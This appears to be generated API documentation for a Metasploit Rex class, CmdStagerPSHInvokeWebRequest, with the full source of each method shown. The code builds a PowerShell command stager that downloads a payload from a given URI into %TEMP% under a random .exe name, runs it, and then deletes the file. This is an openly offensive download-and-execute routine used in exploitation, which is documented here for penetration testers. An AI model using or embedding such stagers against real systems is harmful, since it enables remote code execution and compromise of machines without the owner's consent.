Class: Rex::Exploitation::CmdStagerPSHInvokeWebRequest

Inherits:

CmdStagerBase

• Object
• CmdStagerBase
• Rex::Exploitation::CmdStagerPSHInvokeWebRequest

Defined in:

lib/rex/exploitation/cmdstager/psh_invokewebrequest.rb

Instance Method Summary

• #cmd_concat_operator ⇒ Object
• #generate(opts = {}) ⇒ Object
• #generate_cmds_decoder(opts) ⇒ Object
• #generate_cmds_payload(opts) ⇒ Object
• #http? ⇒ Boolean
• #user_agent ⇒ Object

Methods inherited from CmdStagerBase

#compress_commands, #encode_payload, #generate_cmds, #initialize, #parts_to_commands, #setup, #slice_up_payload, #teardown

Constructor Details

This class inherits a constructor from Rex::Exploitation::CmdStagerBase

Instance Method Details

#cmd_concat_operator ⇒ Object

# File 'lib/rex/exploitation/cmdstager/psh_invokewebrequest.rb', line 42

def cmd_concat_operator
  ' & '
end

#generate(opts = {}) ⇒ Object

# File 'lib/rex/exploitation/cmdstager/psh_invokewebrequest.rb', line 13

def generate(opts = {})
  if opts[:payload_uri].nil?
    raise "#{self.class.name}##{__callee__} missing opts[:payload_uri]"
  end

  opts[:temp] ||= '%TEMP%'
  opts[:file] ||= "#{Rex::Text.rand_text_alpha(8)}.exe"
  @payload_path = "#{opts[:temp]}\\#{opts[:file]}"

  super
end

#generate_cmds_decoder(opts) ⇒ Object

# File 'lib/rex/exploitation/cmdstager/psh_invokewebrequest.rb', line 33

def generate_cmds_decoder(opts)
  cmds = []

  cmds << @payload_path
  cmds << "del #{@payload_path}" unless opts[:nodelete]

  cmds
end

#generate_cmds_payload(opts) ⇒ Object

# File 'lib/rex/exploitation/cmdstager/psh_invokewebrequest.rb', line 25

def generate_cmds_payload(opts)
  # NOTE: This requires PowerShell >= 3.0
  cmd = "Invoke-WebRequest -OutFile #{@payload_path} #{opts[:payload_uri]}"

  # TODO: Craft a better command line, probably with encoding
  ["powershell.exe -c #{cmd}"]
end

#http? ⇒ Boolean

Returns:

• (Boolean)

# File 'lib/rex/exploitation/cmdstager/psh_invokewebrequest.rb', line 5

def http?
  true
end

#user_agent ⇒ Object

# File 'lib/rex/exploitation/cmdstager/psh_invokewebrequest.rb', line 9

def user_agent
  /WindowsPowerShell/
end